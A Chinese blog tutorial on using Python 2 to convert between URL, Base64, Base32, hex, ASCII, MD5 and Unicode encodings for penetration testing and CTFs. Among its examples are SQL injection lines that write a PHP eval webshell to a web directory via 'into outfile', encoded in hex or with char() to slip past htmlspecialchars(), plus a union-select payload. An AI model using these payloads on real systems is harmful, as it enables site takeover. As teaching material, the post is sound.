妙用python之编码转换

zoukankan html css js c++ java

妙用python之编码转换
转自i春秋

文章难易度：★★

知识点：python、编码转换

前言

在日常渗透，漏洞挖掘，甚至是CTF比赛中，会遇到各种编码，常常伴随着这些编码之间的各种转换。记得刚入门那个时候，自己处理编码转换问题往往是“百度：url解码、base64加密、hex……”，或者是使用一款叫做“小葵多功能转换工具”的软件，再后来直接上Burpsuite的decoder功能，感觉用的还挺好的。不过，也遇到些问题：在线转换效率低(搜索占去了2/3的时间)、两款工具存在一些小问题，比如burp中涉及中文往往显示乱码。

直到使用python来作为我日常编码转换工具……

开启py转换之旅

1

url编码

url编码是一种浏览器用来打包表单输入的格式.可谓是一名作为web人员最熟悉的一种编码方式了。
[Python] >>> from urllib import * >>> quote("union select null,null,null") 'union%20select%20null%2Cnull%2Cnull' >>> unquote("union%20select%20null%2Cnull%2Cnull") 'union select null,null,null' >>> urlencode({'x':'2333','y':'666'}) 'y=666&x=2333'
2

Base64

Base64常常用作网页表单和HTTP传输的一些参数，也常用于邮件协议传输用户信息等。
[Python] >>> import base64 >>> base64.b64encode("admin") 'YWRtaW4=' >>> base64.b64decode('YWRtaW4=') 'admin'

或者更简单的
>>> 'YWRtaW4='.decode('base64')
记得有次ctf比赛中考到了base32解密，一般网站不提供在线解密，一时之间貌似没有办法继续下去。不过如果你使用python的话会像上边解密base64一样简单，只需要将函数改变下：
[Python] >>> import base64 >>> base64.b32encode('jjjjj') 'NJVGU2TK' >>> base64.b32decode('NJVGU2TK') 'jjjjj'
3

Hex

十六进制编码也是web application中常见的一种编码方案。作为一名web安全人员，我们心知肚明的是，MySQL注入可以使用hex绕过htmlspecialchars()函数从而写入webshell。
比如：

[SQL]

select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'

下面是python实现hex加解密的方法：
[Python] >>> '<?php @eval($_POST[a]); ?>'.encode('hex') '3c3f70687020406576616c28245f504f53545b615d293b203f3e' >>> >>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex') <?php @eval($_POST[a]); ?>
4

Ascii

MySQL中的char()函数则是转换ascii码的，正因如此，也可以使用这个特性来绕过htmlspecialchars()函数。
比如：

[SQL]

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'

使用python将字符串转换ascii很简单，但是逆转换的话需要需要点小操作：
[Python] >>> map(ord, "<?php phpinfo() ?>") [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62] >>> print chr(112) p >>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62] >>> print ''.join(map(chr,l)) #这里采用pcat表哥指出的方法 <?php phpinfo() ?>
5

Md5

md5在web安全界可以说是人尽皆知了，以他的不可逆性，大多数网站存储用户密码等关键数据时常常使用md5加密。有的时候我们提交payload需要md5加密，这个时候用下面的方法就可以轻松实现。当然解密的话推荐去cmd5。
[Python] >>> from hashlib import md5 >>> m = md5() >>> m.update('this is a secret') >>> m.hexdigest() '7dbbcee180ba4d456e4aa1cfbdad9c7b' >>> m.hexdigest()[8:-8] '80ba4d456e4aa1cf' >>>
另外也可调用python中的md5模块，请参见我的另一篇博文http://www.cnblogs.com/WangAoBo/p/6921865.html
6

Unicode转中文

unicode转换中文，很多情况下都能遇到。尤其是在做渗透测试的时候。用burp的话会存在中文乱码的问题，在python下实现非常简单。
[Python] >>> print u"u4f60u9700u8981u91cdu65b0u767bu9646" 你需要重新登陆
查看全文

相关阅读:
windbg 常用命令
 逐梦
 字体反爬个人心得
 Python字典及基本操作
 openCV学习笔记（3）边缘检测和模板匹配
 使用selenium被识别的解决方法
 使用python发送QQ邮件，以及添加附件
 selenium.common.exceptions.JavascriptException: Message: javascript error: Cannot set property 'playbackRate' of null的解决
 （2）进程管理
 error: (-215:Assertion failed) (depth == CV_8U || depth == CV_32F) && _img.dims() <= 2 in function 'cv::matchTemplate'等opencv踩过的坑

原文地址：https://www.cnblogs.com/WangAoBo/p/6829896.html